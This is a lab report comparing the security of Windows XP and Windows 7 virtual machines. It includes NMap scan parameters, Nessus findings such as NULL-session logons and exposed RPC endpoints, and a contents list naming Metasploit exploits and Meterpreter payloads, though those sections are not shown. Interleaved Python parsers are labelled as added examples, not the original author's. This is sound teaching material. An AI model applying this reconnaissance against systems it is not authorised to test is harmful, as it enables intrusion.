
Enterprise Architecture Testing


7/27/2019 Enterprise Architecture Testing

http://slidepdf.com/reader/full/enterprise-architecture-testing 1/73

VANTAGE POINT COMPUTING

BEN DAHL


PAGE | 2

CONTENTS

Purpose ........ 3

Schedule ........ 4

Acquisitions ........ 5

Installation ........ 6

Patch Management and Configuration ........ 9

Network Discovery (NMap) ........ 12

    Network Map ........ 12

    Windows XP ........ 13

    Windows 7 ........ 14

Vulnerability Scanning (Nessus) ........ 15

    Windows XP ........ 15

    Windows 7 ........ 22

Penetration Testing (Metasploit) ........ 59

    Exploits ........ 59

        Microsoft Server Service Relative Path Stack Corruption ........ 59

        Internet Explorer XML Core Services HTTP Request Handling ........ 60

        Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution ........ 61

    Payloads ........ 62

        Windows Meterpreter (Reflective Injection), Bind TCP Stager ........ 62

        Windows Meterpreter (Reflective Injection), Reverse TCP Stager ........ 62

    Windows XP ........ 63

        Test 1 ........ 63

        Test 2 ........ 63

        Test 3 ........ 64

        Test 4 ........ 64

        Test 5 ........ 65

        Test 6 ........ 65

    Windows 7 ........ 67

        Test 1 ........ 67

        Test 2 ........ 67

        Test 3 ........ 68

        Test 4 ........ 68

        Test 5 ........ 69

        Test 6 ........ 71

Conclusion ........ 72


PAGE | 3

PURPOSE

Information is the most critical asset in any organization. Proprietary data, information, and knowledge are just as valuable to a business as tangible assets. As such, information needs to be suitably protected and secured in a fashion as rigorous as that of other business assets. This is especially important with the increasing number of vulnerabilities and threats and the interconnected nature of the business environment.

The Windows Operating Environment is the most common environment in the corporate world. Currently, Windows XP represents the largest share of the market, but Windows 7 looms on the horizon. Given a clean installation of the Windows Operating Environment and physical access to the network, which operating system, Windows XP or Windows 7, is more secure?

In order to execute this scenario, a lab environment will be created for testing purposes. The lab will consist of one physical server with VirtualBox and two virtual machines. One virtual machine will have Windows XP and the other will have Windows 7 (both acquired through DePaul via the MSDNAA). All tests will be performed with NETLAB (the physical server) in a manner similar to those used in the Vantage Point Computing Security Policy.

Evaluation will be done in a manner similar to the IS433 and IS533 classes at DePaul. In concurrence with the following schedule, an infrastructure will be established and verified. This will be followed by testing with NMAP, Nessus, and Metasploit to determine the potential vulnerabilities and then test their weaknesses.

Ultimately, the final goal is to verify the security of the two Windows versions. Windows XP has been tested, patched, and service packed over the course of almost a decade. Windows 7 has been publicly available for less than a year. Did Microsoft learn from their mistakes with Windows XP? Are all the vulnerabilities that were patched throughout the lifecycle of Windows XP still secure, or are they open in Windows 7? Furthermore, is the upgrade to Windows 7 recommended for enterprise use, or only for home use? Throughout the course of testing, these questions, along with many others, will be answered.


PAGE | 4

SCHEDULE

•  Week One: Acquisitions
   o Acquire two lab machines
   o Acquire switch and cables
   o Acquire Windows XP
   o Acquire Windows 7
     ▪ Deliverable: Lab Environment pictures

•  Week Two: Installation
   o Install Windows 7
   o Install Windows XP
   o Verify network connectivity of lab machines
     ▪ Deliverable: Windows Desktop Screenshots

•  Week Three: Patch Management & Configuration
   o Install latest Windows 7 patches
   o Install latest Windows XP patches
   o Verify network connectivity of WHEELJACK
   o Verify functionality of testing tools on WHEELJACK
     ▪ Deliverable: netstat -ano screenshots

•  Week Four & Five: NMAP
   o Execute NMAP scans to map network
     ▪ Deliverable: NMAP network map
     ▪ Deliverable: NMAP Report Draft

•  Week Six & Seven: Nessus
   o Run Nessus scans on Windows XP
   o Run Nessus scans on Windows 7
     ▪ Deliverable: Nessus Report Files
     ▪ Deliverable: Nessus Report Draft

•  Week Eight & Nine: Metasploit
   o Run Metasploit against Windows XP
   o Run Metasploit against Windows 7
     ▪ Deliverable: Metasploit console screenshots
     ▪ Deliverable: Metasploit Report Draft

•  Week Ten:
   o Final testing
   o Revisions
     ▪ Deliverable: Final project report


PAGE | 5

ACQUISITIONS

o Acquire two lab machines

o Acquire switch and cables

o Acquire Windows XP

o Acquire Windows 7

As opposed to acquiring two separate lab machines, and after discussions with James Krev, the acquisitions assignment was modified to reflect virtualization using Sun VirtualBox. VirtualBox was installed on a physical server (NETLAB) running Windows XP.

Additionally, Windows XP and Windows 7 were downloaded and installed as separate virtual instances within VirtualBox.


PAGE | 6

INSTALLATION

o Install Windows 7

o Install Windows XP

o Verify network connectivity of lab machines

The following screenshots depict the virtual installations of Windows 7.

Windows7: ipconfig /all – To verify network connectivity and acquisition of an IP address.


PAGE | 7

Windows7: netstat -ano – Displays open ports and Process IDs.

The following screenshots depict the virtual installations of Windows XP.

WindowsXP: ipconfig /all – To verify network connectivity and acquisition of an IP address.


PAGE | 8

WindowsXP: netstat -ano – Displays open ports and Process IDs.


PAGE | 9

PATCH MANAGEMENT AND CONFIGURATION

o Install latest Windows 7 patches

o Install latest Windows XP patches

o Verify network connectivity of NETLAB

o Verify functionality of testing tools on NETLAB

The following screenshot depicts the virtual installation of Windows 7.

Windows7: Windows Update – To verify the operating system is patched to the most recent version.


PAGE | 10

The following screenshot depicts the virtual installation of Windows XP.

WindowsXP: Windows Update – To verify the operating system is patched to the most recent version.

The following screenshots depict the NETLAB server.

NETLAB: ipconfig /all – To verify network connectivity.


PAGE | 11

NETLAB: Tools (Nessus / NMap / Metasploit)


PAGE | 12

NETWORK DISCOVERY (NMAP)

NMap was used to create a complete network topology of the local area network that NETLAB (including the virtual machines) is part of.

Local Address 192.168.0.166 is the IP address of the Windows XP virtual machine.

Local Address 192.168.0.171 is the IP address of the Windows 7 virtual machine.

NMap was used with the following parameters:

-p1-65535 - Scans ports 1-65535.

-T4 - Sets the timing template for the scans.

-sS - Runs NMap in SYN (stealth) scan mode.

192.168.0.1/24 - Scans all hosts on the local network to create the map.

192.168.0.166 - Scans the Windows XP virtual machine.

192.168.0.171 - Scans the Windows 7 virtual machine.

NETWORK MAP


PAGE | 13

WINDOWS XP

The NMap scan of Windows XP revealed 65535 scanned ports, all of which were filtered.


PAGE | 14

WINDOWS 7

The NMap scan of the Windows 7 virtual machine scanned 65535 ports, 7 of which were open.
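The two scan results above (every port filtered on Windows XP, seven open on Windows 7) are the kind of comparison that is easiest to make from NMap's grepable output (-oG) rather than from screenshots. The following script is an added example and is not part of the original report: it parses grepable output, lists each host's open ports, and reports which ports the second host exposes that the first does not. SAMPLE_GNMAP is a constructed result shaped like the report's findings; the specific Windows 7 port list in it is illustrative, not the report's actual data.

```python
"""Summarize an nmap grepable (-oG) scan and compare two hosts' exposure.

Added example, not part of the original report. SAMPLE_GNMAP is a constructed
grepable-format result shaped like the report's findings (XP: every port
filtered; Windows 7: seven open ports). The Windows 7 port list is
illustrative, not the report's actual port list.
"""
import re
from dataclasses import dataclass, field

SAMPLE_GNMAP = """\
# constructed sample of 'nmap -p1-65535 -T4 -sS -oG lab.gnmap' output
Host: 192.168.0.166 ()\tStatus: Up
Host: 192.168.0.166 ()\tPorts: \tIgnored State: filtered (65535)
Host: 192.168.0.171 ()\tStatus: Up
Host: 192.168.0.171 ()\tPorts: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 2869/open/tcp//icslap///, 49152/open/tcp//unknown///, 49153/open/tcp//unknown///, 49154/open/tcp//unknown///\tIgnored State: filtered (65528)
"""

# grepable port entries look like port/state/protocol/owner/service/rpcinfo/version/
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)//([^/]*)///")
IGNORED_RE = re.compile(r"Ignored State: (\w+) \((\d+)\)")


@dataclass
class HostResult:
    ip: str
    open_ports: list = field(default_factory=list)   # (port, proto, service)
    ignored_state: str = ""    # the state nmap collapsed the unlisted ports into
    ignored_count: int = 0


def parse_gnmap(text):
    """Return {ip: HostResult}; a host with no listed ports keeps an empty list."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):       # skips '#' comment lines
            continue
        fields = line.split("\t")
        ip = fields[0].split()[1]
        host = hosts.setdefault(ip, HostResult(ip))
        for part in fields[1:]:
            if part.startswith("Ports:"):
                for port, state, proto, service in PORT_RE.findall(part):
                    if state == "open":
                        host.open_ports.append((int(port), proto, service))
            m = IGNORED_RE.search(part)
            if m:
                host.ignored_state, host.ignored_count = m.group(1), int(m.group(2))
    return hosts


def exposure_delta(hosts, baseline_ip, candidate_ip):
    """(port, proto) pairs open on the candidate host but not on the baseline."""
    base = {(p, proto) for p, proto, _ in hosts[baseline_ip].open_ports}
    cand = {(p, proto) for p, proto, _ in hosts[candidate_ip].open_ports}
    return sorted(cand - base)


def summary_line(host):
    ports = ", ".join(f"{p}/{proto}" for p, proto, _ in host.open_ports) or "none"
    return f"{host.ip}: {len(host.open_ports)} open ({ports}); {host.ignored_count} {host.ignored_state}"


if __name__ == "__main__":
    results = parse_gnmap(SAMPLE_GNMAP)
    for h in results.values():
        print(summary_line(h))
    print("newly exposed by the second host:", exposure_delta(results, "192.168.0.166", "192.168.0.171"))
```

The parser deliberately tolerates a host line whose Ports field is empty, which is how a fully filtered host such as the XP machine above appears; a naive split on the port list would raise on that line.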


PAGE | 15

VULNERABILITY SCANNING (NESSUS)

WINDOWS XP

192.168.0.166 

Scan time :

Start time : Mon Nov 23 14:14:17 2009 

End time : Mon Nov 23 14:14:41 2009 

Number of vulnerabilities :

Open ports : 5 

Low : 8 

Medium : 0 

High : 0 

Information about the remote host :

Operating system : (unknown) 

NetBIOS name : WINXP 

DNS name : (unknown) 


PAGE | 16

Port netbios-ns (137/udp) 

Using NetBIOS or SMB to retrieve information from a Windows host  

Synopsis : 

It is possible to obtain the network name of the remote host.

Description : 

The remote host listens on UDP port 137 or TCP port 445 and replies to NetBIOS nbtscan or SMB requests.

Note that this plugin gathers information to be used in other plugins but does not itself generate a report.

Solution : 

n/a

Risk factor : 

None

Plugin output : 

The following 6 NetBIOS names have been gathered :

WINXP = Computer name

WORKGROUP = Workgroup / Domain name

WINXP = File Server Service

WORKGROUP = Browser Service Elections

WORKGROUP = Master Browser

__MSBROWSE__ = Master Browser

The remote host has the following MAC address on its adapter :

08:00:27:09:16:8a

Nessus ID : 10150 


PAGE | 17

Port microsoft-ds (445/tcp) 

SMB Detection 

Synopsis : 

A file / print sharing service is listening on the remote host.

Description : 

The remote service understands the CIFS (Common Internet File System) or Server Message Block (SMB) protocol, used to provide shared access to files, printers, etc between nodes on a network.

Solution : 

n/a

Risk factor : 

None

Plugin output : 

A CIFS server is running on this port.

Nessus ID : 11011 

SMB NativeLanMan 

Synopsis : 

It is possible to obtain information about the remote operating system.

Description : 

It is possible to get the remote operating system name and version (Windows and/or Samba) by sending an authentication request to port 139 or 445.

Solution : 


n/a

Risk factor : 

None

Plugin output : 

The remote Operating System is : Windows 5.1

The remote native lan manager is : Windows 2000 LAN Manager

The remote SMB Domain Name is : WINXP

Nessus ID : 10785 

SMB log in 

Synopsis : 

It is possible to log into the remote host.

Description : 

The remote host is running one of the Microsoft Windows operating systems. It was possible to log into it using one of the following accounts:

- NULL session

- Guest account

- Given Credentials

See also : 

http://support.microsoft.com/support/kb/articles/Q143/4/74.ASP 

http://support.microsoft.com/support/kb/articles/Q246/2/61.ASP 

Solution : 

n/a

Risk factor : 

None


PAGE | 19

Plugin output : 

- NULL sessions are enabled on the remote host 

CVE : CVE-1999-0504, CVE-1999-0505, CVE-1999-0506, CVE-2000-0222, CVE-2002-1117, CVE-2005-3595

BID : 494, 990, 11199

Nessus ID : 10394 

SMB LanMan Pipe Server browse listing 

Synopsis : 

It is possible to obtain network information.

Description : 

It was possible to obtain the browse list of the remote Windows system by sending a request to the LANMAN pipe. The browse list is the list of the nearest Windows systems of the remote host.

Solution : 

n/a

Risk factor : 

None

Plugin output : 

Here is the browse list of the remote host :

WINXP ( os : 5.1 )

Other references : OSVDB:300

Nessus ID : 10397 


PAGE | 20

SMB NULL session 

Synopsis : 

It is possible to log into the remote Windows host with a NULL session.

Description : 

The remote host is running Microsoft Windows, and it was possible to log into it using a NULL session (ie, with no login or password). An unauthenticated remote attacker can leverage this issue to get information about the remote host.

See also : 

http://support.microsoft.com/support/kb/articles/Q143/4/74.ASP 

http://support.microsoft.com/support/kb/articles/Q246/2/61.ASP 

Solution : 

n/a

Risk factor : 

None

CVE : CVE-2002-1117

BID : 494

Nessus ID : 26920 

SMB registry can not be accessed by the scanner 

Synopsis : 

Nessus is not able to access the remote Windows Registry.

Description : 

It was not possible to connect to PIPE\winreg on the remote host. If you intend to use Nessus to perform registry-based checks, the registry checks will not work because the 'Remote Registry Access' service (winreg) has been disabled on the remote host or can not be connected to with the supplied credentials.

Solution : 

n/a

Risk factor : 

None

Nessus ID : 26917 

Port epmap (135/tcp) 

Port icslap (2869/tcp) 

Port netbios-ssn (139/tcp) 

SMB Detection 

Synopsis : 

A file / print sharing service is listening on the remote host.

Description : 

The remote service understands the CIFS (Common Internet File System) or Server Message Block (SMB) protocol, used to provide shared access to files, printers, etc between nodes on a network.

Solution : 

n/a

Risk factor : 

None

Plugin output : 

An SMB server is running on this port.

Nessus ID : 11011 
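Every Windows XP finding above carries a risk factor of "None", yet two of them (anonymous NULL-session logon and the LanMan browse listing) are information leaks an administrator would want to close, and three open ports (135, 139, 2869) produced no plugin output at all. The script below is an added example, not part of the original report or of Nessus: it parses the plain-text export layout used above ("Port ...", plugin title, "Synopsis :", "Risk factor :", "Plugin output :", "Nessus ID :") and applies a small triage rule to it. SAMPLE_REPORT is a shortened re-typing of the report's own 192.168.0.166 output; the triage criteria are mine.

```python
"""Parse a Nessus plain-text export and triage 'Risk factor: None' findings.

Added example, not part of the original report. SAMPLE_REPORT is a trimmed
re-typing of the report's Windows XP results; the triage rules are the
author's of this example, not Nessus's.
"""
import re

PORT_RE = re.compile(r"^Port (\S+) \((\d+)/(tcp|udp)\)$")
HEADER_RE = re.compile(r"^([A-Za-z ]+?) :\s*(.*)$")
# Field headers the export uses; any other 'x : y' line is plugin output text.
KNOWN_FIELDS = {"Synopsis", "Description", "Solution", "Risk factor", "Plugin output",
                "See also", "CVE", "BID", "Other references", "Nessus ID"}

SAMPLE_REPORT = """\
Port netbios-ns (137/udp)
Using NetBIOS or SMB to retrieve information from a Windows host
Synopsis :
It is possible to obtain the network name of the remote host.
Risk factor :
None
Plugin output :
WINXP = Computer name
WORKGROUP = Workgroup / Domain name
Nessus ID : 10150
Port microsoft-ds (445/tcp)
SMB Detection
Synopsis :
A file / print sharing service is listening on the remote host.
Risk factor :
None
Plugin output :
A CIFS server is running on this port.
Nessus ID : 11011
SMB log in
Synopsis :
It is possible to log into the remote host.
Description :
The remote host is running one of the Microsoft Windows operating
systems. It was possible to log into it using one of the following
account :
- NULL session
Risk factor :
None
Plugin output :
- NULL sessions are enabled on the remote host
CVE : CVE-1999-0504, CVE-1999-0505, CVE-2002-1117
BID : 494, 990, 11199
Nessus ID : 10394
Port epmap (135/tcp)
Port icslap (2869/tcp)
"""


def parse_nessus_text(text):
    """Return (ports, findings): ports as (number, proto, service) in the order
    seen; findings as {"port", "name", "fields"} dicts, one per 'Nessus ID'."""
    ports, findings = [], []
    port = current = field_name = None
    expect_title = False                 # next non-empty line names a plugin
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = PORT_RE.match(line)
        if m:
            port = (int(m.group(2)), m.group(3), m.group(1))
            ports.append(port)
            expect_title = True
            continue
        if expect_title:
            current = {"port": port, "name": line, "fields": {}}
            field_name, expect_title = None, False
            continue
        m = HEADER_RE.match(line)
        if m and m.group(1) in KNOWN_FIELDS and current is not None:
            field_name = m.group(1)
            current["fields"][field_name] = m.group(2).strip()
            if field_name == "Nessus ID":        # closes the finding
                findings.append(current)
                current, expect_title = None, True
            continue
        if current is not None and field_name is not None:   # continuation line
            current["fields"][field_name] = f"{current['fields'][field_name]} {line}".strip()
    return ports, findings


def triage(findings):
    """Findings rated 'None' that still describe an exposure worth fixing."""
    flagged = []
    for f in findings:
        fields = f["fields"]
        text = f["name"] + " " + fields.get("Plugin output", "")
        if "NULL session" in text:
            flagged.append((f["name"], f["port"], "anonymous SMB access: restrict anonymous "
                            "enumeration (RestrictAnonymous LSA policy) and filter 139/445"))
        elif fields.get("Risk factor") == "None" and fields.get("CVE"):
            flagged.append((f["name"], f["port"], "rated None but references " + fields["CVE"]))
    return flagged


def ports_without_findings(ports, findings):
    """Open ports no plugin reported on: still reachable, merely unexplained."""
    covered = {f["port"] for f in findings}
    return [p for p in ports if p not in covered]
```

The parser keys on the fixed header set rather than on any "x : y" line, because plugin output itself contains such lines ("The remote Operating System is : Windows 5.1") that must stay inside the Plugin output field.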


PAGE | 22

WINDOWS 7

192.168.0.171 

Scan time :

Start time : Mon Nov 23 13:52:49 2009 

End time : Mon Nov 23 13:53:33 2009 

Number of vulnerabilities :

Open ports : 12 

Low : 16 

Medium : 0 

High : 0 

Information about the remote host :

Operating system : (unknown) 

NetBIOS name : WIN7 

DNS name : (unknown) 


PAGE | 23

Port unknown (49155/tcp) 

DCE Services Enumeration 

Synopsis : 

A DCE/RPC service is running on the remote host.

Description : 

By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe.

Solution : 

N/A

Risk factor : 

None

Plugin output : 

The following DCERPC services are available on TCP port 49155 :

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0

Description : Security Account Manager

Windows process : lsass.exe

Type : Remote RPC service

TCP Port : 49155

IP : 192.168.0.171

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0

Description : Unknown RPC service

Annotation : KeyIso

Type : Remote RPC service

TCP Port : 49155

IP : 192.168.0.171

Nessus ID : 10736 


PAGE | 24

Port netbios-ns (137/udp) 

Using NetBIOS or SMB to retrieve information from a Windows host  

Synopsis : 

It is possible to obtain the network name of the remote host.

Description : 

The remote host listens on UDP port 137 or TCP port 445 and replies to NetBIOS nbtscan or SMB requests.

Note that this plugin gathers information to be used in other plugins but does not itself generate a report.

Solution : 

n/a

Risk factor : 

None

Plugin output : 

The following 6 NetBIOS names have been gathered :

WIN7 = Computer name

WORKGROUP = Workgroup / Domain name

WIN7 = File Server Service

WORKGROUP = Browser Service Elections

WORKGROUP = Master Browser

__MSBROWSE__ = Master Browser

The remote host has the following MAC address on its adapter :

08:00:27:ef:92:b3

Nessus ID : 10150 


PAGE | 25

Port unknown (49156/tcp) 

DCE Services Enumeration 

Synopsis : 

A DCE/RPC service is running on the remote host.

Description : 

By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe.

Solution : 

N/A

Risk factor : 

None

Plugin output : 

The following DCERPC services are available on TCP port 49156 :

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 367abb81-9844-35f1-ad32-98f038001003, version 2.0

Description : Unknown RPC service

Type : Remote RPC service

TCP Port : 49156

IP : 192.168.0.171

Nessus ID : 10736 


PAGE | 26

Port unknown (49153/tcp) 

DCE Services Enumeration 

Synopsis : 

A DCE/RPC service is running on the remote host.

Description : 

By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe.

Solution : 

N/A

Risk factor : 

None

Plugin output : 

The following DCERPC services are available on TCP port 49153 :

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : f6beaff7-1e19-4fbb-9f8f-b89e2018337c, version 1.0

Description : Unknown RPC service

Annotation : Event log TCPIP

Type : Remote RPC service

TCP Port : 49153

IP : 192.168.0.171

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 30adc50c-5cbc-46ce-9a0e-91914789e23c, version 1.0

Description : Unknown RPC service

Annotation : NRP server endpoint

Type : Remote RPC service

TCP Port : 49153

IP : 192.168.0.171

Object UUID : 00000000-0000-0000-0000-000000000000


UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0

Description : DHCP Client Service

Windows process : svchost.exe

Annotation : DHCP Client LRPC Endpoint 

Type : Remote RPC service

TCP Port : 49153

IP : 192.168.0.171

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0

Description : Unknown RPC service

Annotation : DHCPv6 Client LRPC Endpoint 

Type : Remote RPC service

TCP Port : 49153

IP : 192.168.0.171

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 06bba54a-be05-49f9-b0a0-30f790261023, version 1.0

Description : Unknown RPC service

Annotation : Security Center

Type : Remote RPC service

TCP Port : 49153

IP : 192.168.0.171

Nessus ID : 10736 

Port unknown (49154/tcp) 

DCE Services Enumeration 

Synopsis : 

A DCE/RPC service is running on the remote host.

Description : 

By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe.

Solution : 

N/A

Risk factor : 

None

Plugin output : 

The following DCERPC services are available on TCP port 49154 :

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0

Description : Unknown RPC service

Type : Remote RPC service

TCP Port : 49154

IP : 192.168.0.171

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0

Description : Unknown RPC service

Annotation : IP Transition Configuration endpoint 

Type : Remote RPC service

TCP Port : 49154

IP : 192.168.0.171

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0

Description : Unknown RPC service

Annotation : XactSrv service

Type : Remote RPC service

TCP Port : 49154

IP : 192.168.0.171

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 201ef99a-7fa0-444c-9399-19ba84f12a1a, version 1.0

Description : Unknown RPC service

Annotation : AppInfo

Type : Remote RPC service

TCP Port : 49154

IP : 192.168.0.171

Object UUID : 00000000-0000-0000-0000-000000000000


UUID : 5f54ce7d-5b79-4175-8584-cb65313a0e98, version 1.0

Description : Unknown RPC service

Annotation : AppInfo

Type : Remote RPC service

TCP Port : 49154

IP : 192.168.0.171

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : fd7a0523-dc70-43dd-9b2e-9c5ed48225b1, version 1.0

Description : Unknown RPC service

Annotation : AppInfo

Type : Remote RPC service

TCP Port : 49154

IP : 192.168.0.171

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 58e604e8-9adb-4d2e-a464-3b0683fb1480, version 1.0

Description : Unknown RPC service

Annotation : AppInfo

Type : Remote RPC service

TCP Port : 49154

IP : 192.168.0.171

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0

Description : Unknown RPC service

Annotation : IKE/Authip API

Type : Remote RPC service

TCP Port : 49154

IP : 192.168.0.171

Nessus ID : 10736 


PAGE | 30

Port unknown (49152/tcp) 

DCE Services Enumeration 

Synopsis : 

A DCE/RPC service is running on the remote host.

Description : 

By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe.

Solution : 

N/A

Risk factor : 

None

Plugin output : 

The following DCERPC services are available on TCP port 49152 :

Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91

UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0

Description : Unknown RPC service

Type : Remote RPC service

TCP Port : 49152

IP : 192.168.0.171

Nessus ID : 10736 
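The DCE Services Enumeration output repeated above for ports 49152 through 49156 is long because Nessus prints one block per interface, and the same interface (for instance the Security Account Manager interface served by lsass.exe) shows up on several endpoints. The script below is an added example, not part of the original report or of the Nessus plugin: it collapses that output into a per-port list and marks the interfaces that matter most for an exposure review. SAMPLE_OUTPUT re-types the report's own entries for TCP ports 49155 and 49156; the SAMR label comes from the page's "Security Account Manager" description, while the SVCCTL label for 367abb81-9844-35f1-ad32-98f038001003 is my identification of an interface the plugin reported as "Unknown RPC service".

```python
"""Summarize DCE/RPC endpoints from Nessus plugin 10736 output.

Added example, not part of the original report. SAMPLE_OUTPUT re-types the
report's entries for TCP ports 49155 and 49156 on 192.168.0.171. The names in
KNOWN_INTERFACES are labels supplied by this example: SAMR matches the page's
own "Security Account Manager" description; SVCCTL is my identification of
an interface Nessus listed as "Unknown RPC service".
"""

SAMPLE_OUTPUT = """\
The following DCERPC services are available on TCP port 49155 :
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0
Description : Security Account Manager
Windows process : lsass.exe
Type : Remote RPC service
TCP Port : 49155
IP : 192.168.0.171
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0
Description : Unknown RPC service
Annotation : KeyIso
Type : Remote RPC service
TCP Port : 49155
IP : 192.168.0.171
The following DCERPC services are available on TCP port 49156 :
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 367abb81-9844-35f1-ad32-98f038001003, version 2.0
Description : Unknown RPC service
Type : Remote RPC service
TCP Port : 49156
IP : 192.168.0.171
"""

KNOWN_INTERFACES = {
    "12345778-1234-abcd-ef00-0123456789ac": "SAMR: Security Account Manager (lsass.exe)",
    "367abb81-9844-35f1-ad32-98f038001003": "SVCCTL: Service Control Manager",
}


def parse_dce_output(text):
    """One dict per 'Object UUID' block; 'UUID : <iface>, version <v>' is split."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if " : " not in line:          # the 'available on TCP port N :' header has no value
            continue
        key, _, value = line.partition(" : ")
        key, value = key.strip(), value.strip()
        if key == "Object UUID":
            current = {"object_uuid": value}
            records.append(current)
        elif current is None:
            continue
        elif key == "UUID":
            iface, _, version = value.partition(", version ")
            current["uuid"], current["version"] = iface.lower(), version
        else:
            current[key] = value
    return records


def endpoints_by_port(records):
    """Group records by TCP port (or named pipe for the 445/tcp listing)."""
    by_port = {}
    for r in records:
        endpoint = int(r["TCP Port"]) if "TCP Port" in r else r.get("Named pipe", "?")
        by_port.setdefault(endpoint, []).append(r)
    return by_port


def unique_interfaces(records):
    """Distinct interface UUIDs, independent of how many endpoints serve them."""
    return sorted({r["uuid"] for r in records if "uuid" in r})


def sensitive_endpoints(records):
    """(endpoint, uuid, label) for interfaces in KNOWN_INTERFACES."""
    hits = []
    for r in records:
        label = KNOWN_INTERFACES.get(r.get("uuid"))
        if label:
            hits.append((r.get("TCP Port") or r.get("Named pipe"), r["uuid"], label))
    return hits
```

Reading the report through this lens, the point for a defender is that the dynamic-port range (49152 and up) is reachable from the scanning host at all; the endpoint mapper on 135/tcp is what lets a remote client find these ports, so filtering 135/tcp and the dynamic range from untrusted segments removes the whole enumeration surface rather than one interface at a time.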


PAGE | 31

Port microsoft-ds (445/tcp) 

SMB Detection 

Synopsis : 

A file / print sharing service is listening on the remote host.

Description : 

The remote service understands the CIFS (Common Internet File System) or Server Message Block (SMB) protocol, used to provide shared access to files, printers, etc between nodes on a network.

Solution : 

n/a

Risk factor : 

None

Plugin output : 

A CIFS server is running on this port.

Nessus ID : 11011 

DCE Services Enumeration 

Synopsis : 

A DCE/RPC service is running on the remote host.

Description : 

By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe.

Solution : 


N/A

Risk factor : 

None

Plugin output : 

The following DCERPC services are available remotely :

Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91

UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0

Description : Unknown RPC service

Type : Remote RPC service

Named pipe : \PIPE\InitShutdown

Netbios name : \\WIN7

Object UUID : b08669ee-8cb5-43a5-a017-84fe00000000

UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0

Description : Unknown RPC service

Type : Remote RPC service

Named pipe : \PIPE\InitShutdown

Netbios name : \\WIN7

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : b58aa02e-2884-4e97-8176-4ee06d794184, version 1.0

Description : Unknown RPC service

Type : Remote RPC service

Named pipe : \pipe\trkwks

Netbios name : \\WIN7

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0

Description : Security Account Manager

Windows process : lsass.exe

Type : Remote RPC service

Named pipe : \pipe\lsass

Netbios name : \\WIN7

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0

Description : Security Account Manager

Windows process : lsass.exe

Type : Remote RPC service

Named pipe : \PIPE\protected_storage

Netbios name : \\WIN7

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0

Description : Unknown RPC service

Annotation : KeyIso

Type : Remote RPC service

Named pipe : \pipe\lsass

Netbios name : \\WIN7

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0

Description : Unknown RPC service

Annotation : KeyIso

Type : Remote RPC service

Named pipe : \PIPE\protected_storage

Netbios name : \\WIN7

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0

Description : Scheduler Service

Windows process : svchost.exe

Type : Remote RPC service

Named pipe : \PIPE\atsvc

Netbios name : \\WIN7

Object UUID : 00000000-0000-0000-0000-000000000000

